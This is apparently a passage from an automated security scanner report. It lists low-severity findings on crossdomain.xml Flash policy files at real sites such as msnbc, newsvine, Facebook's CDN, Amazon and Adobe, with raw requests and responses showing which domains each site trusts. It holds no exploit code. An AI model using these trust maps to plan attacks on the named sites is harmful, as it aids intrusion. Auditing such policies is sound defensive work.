Date: Sun, 30 Jan 2011 02:17:47 GMT
Server: Apache
Last-Modified: Wed, 15 Dec 2010 14:02:49 GMT
ETag: "434d16-52f-497736470f440"
Accept-Ranges: bytes
Content-Length: 1327
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-http-request-headers-f
...[SNIP]...
<allow-access-from domain="*.photobucket.com" />
<allow-access-from domain="*.tinypic.com" />
<allow-access-from domain="*.englaze.com" />
<allow-access-from domain="*.englaze.net" />
<allow-access-from domain="*.nglaze.com" />
<allow-access-from domain="*.nglaze.net" />
<allow-access-from domain="*.flektor-dev.com"/>
<allow-access-from domain="*.flektor-lab.com"/>
<allow-access-from domain="*.flektor.com"/>
<allow-access-from domain="*.flip.com"/>
<allow-access-from domain="*.advancemags.com"/>
<allow-access-from domain="*.dannypatterson.com"/>
<allow-access-from domain="*.scrapblog.com" />
<allow-access-from domain="*.scrapblog.net" />
<allow-access-from domain="*.photoshop.com" />
<allow-access-from domain="*.adobe.com" />
<allow-access-from domain="*.mego.com" />
<allow-access-from domain="*.5glabs.com" />
<allow-access-from domain="*.zude.com" />
<allow-access-from domain="*.fotoflexer.com" />
<allow-access-from domain="photobkt-images.adbureau.net" />
<allow-access-from domain="*.pbsrc.com" />
...[SNIP]...

6.73. http://player.ooyala.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://player.ooyala.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 16 Jul 2010 14:51:39 GMT
Accept-Ranges: bytes
Content-Type: text/x-cross-domain-policy
Cache-Control: public, max-age=3600
Date: Sun, 30 Jan 2011 12:49:00 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 330

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.ooyala.com" />
...[SNIP]...

6.74. http://rachel.msnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://rachel.msnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rachel.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:18:12 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.75. http://redtape.newsvine.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://redtape.newsvine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: redtape.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:18:24 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT
ETag: "3c057-191-492fdc72f7540"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=981
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.76. http://static.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-Cnection: close
Date: Sun, 30 Jan 2011 01:24:11 GMT
Content-Length: 1581
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
...[SNIP]...
<allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="external.ak.fbcdn.net" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
...[SNIP]...

6.77. http://suzanne-choney.newsvine.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://suzanne-choney.newsvine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: suzanne-choney.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:29 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT
ETag: "3c057-191-492fdc72f7540"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=980
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.78. http://technolog2.newsvine.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://technolog2.newsvine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: technolog2.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:53:39 GMT
Server: Apache/2.2.14 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT
ETag: "12f800b-191-492fdc72f7540"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=990
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.79. http://thelastword.msnbc.redacted/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://thelastword.msnbc.redacted
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: thelastword.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:52 GMT
ETag: "20b4005-191-492fdc7203300"
Accept-Ranges: bytes
Content-Length: 401
Content-Type: text/xml
Date: Sun, 30 Jan 2011 02:55:26 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.80. http://today.msnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://today.msnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: today.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:56:38 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.81. http://toddkenreck.newsvine.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://toddkenreck.newsvine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: toddkenreck.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:57:49 GMT
Server: Apache/2.2.14 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT
ETag: "12f800b-191-492fdc72f7540"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=990
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.82. http://top.newsvine.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://top.newsvine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: top.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:58:28 GMT
Server: Apache/2.2.14 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT
ETag: "12f800b-191-492fdc72f7540"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=1000
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.83. http://tv.msnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://tv.msnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tv.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 03:01:27 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.84. http://wbenedetti.newsvine.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://wbenedetti.newsvine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: wbenedetti.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:05:14 GMT
Server: Apache/2.2.14 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT
ETag: "12f800b-191-492fdc72f7540"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=999
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.85. http://www.adobe.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 12 Jan 2011 18:55:31 GMT
ETag: "144-bec64ec0"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Sat, 29 Jan 2011 20:53:25 GMT
Keep-Alive: timeout=5, max=500
Content-Type: text/x-cross-domain-policy
Connection: close
Date: Sun, 30 Jan 2011 01:52:11 GMT
Age: 196
Content-Length: 324

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*.macromedia.com" />
   <allow-access-from domain="*.adobe.com" />
   <allow-access-from domain="*.photoshop.com" />
   <allow-access-from domain="*.acrobat.com" />
...[SNIP]...

6.86. http://www.amazon.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.amazon.com

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:30:31 GMT
Server: Server
Last-Modified: Tue, 09 Nov 2010 18:03:08 GMT
ETag: "3e0-8d97ef00"
Accept-Ranges: bytes
Content-Length: 992
Vary: Accept-Encoding,User-Agent
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.amazon.com" />
<allow-access-from domain="amazon.com" />
...[SNIP]...
<allow-access-from domain="pre-prod.amazon.com" />
<allow-access-from domain="devo.amazon.com" />
<allow-access-from domain="anon.amazon.speedera.net" />
<allow-access-from domain="*.images-amazon.com" />
<allow-access-from domain="*.ssl-images-amazon.com" />
<allow-access-from domain="*.amazon.ca" />
<allow-access-from domain="*.amazon.cn" />
<allow-access-from domain="*.amazon.de" />
<allow-access-from domain="*.amazon.fr" />
<allow-access-from domain="*.amazon.it" />
<allow-access-from domain="*.amazon.jp" />
<allow-access-from domain="*.amazon.co.jp" />
<allow-access-from domain="*.amazon.uk" />
<allow-access-from domain="*.amazon.co.uk" />
...[SNIP]...

6.87. http://www.blackvoices.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blackvoices.com

Response

HTTP/1.0 200 OK
set-cookie: dcisid=2393099708.970474317.4095214336; path=/
MIME-Version: 1.0
Date: Sun, 30 Jan 2011 01:52:17 GMT
Server: AOLserver/4.0.10
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 1511
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.digitalcity.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="*.news.aol.com" />
<allow-access-from domain="iamalpha.com" />
<allow-access-from domain="imakealpha.com" />
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " />
<allow-access-from domain="*.spinner.com" />
<allow-access-from domain="*.popeater.com" />
<allow-access-from domain="*.theboombox.com" />
<allow-access-from domain="*.opticalcortex.com" />
<allow-access-from domain="static.stats.com" />
<allow-access-from domain="*.moviefone.com" />
<allow-access-from domain="*.aolhealth.com" />
<allow-access-from domain="*.walletpop.com" />
<allow-access-from domain="*.stats.com" />
<allow-access-from domain="*.lightningcast.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="*.fanhouse.com" />
<allow-access-from domain="*platformaprojects.com" />
...[SNIP]...

6.88. http://www.dooce.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dooce.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dooce.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:52:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Last-Modified: Wed, 01 Sep 2010 16:56:47 GMT
ETag: "67b2ba4-120-48f359541d1c0"
Accept-Ranges: bytes
Content-Length: 288
Cache-Control: max-age=1209600
Expires: Sun, 13 Feb 2011 01:52:34 GMT
Connection: close
Content-Type: application/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
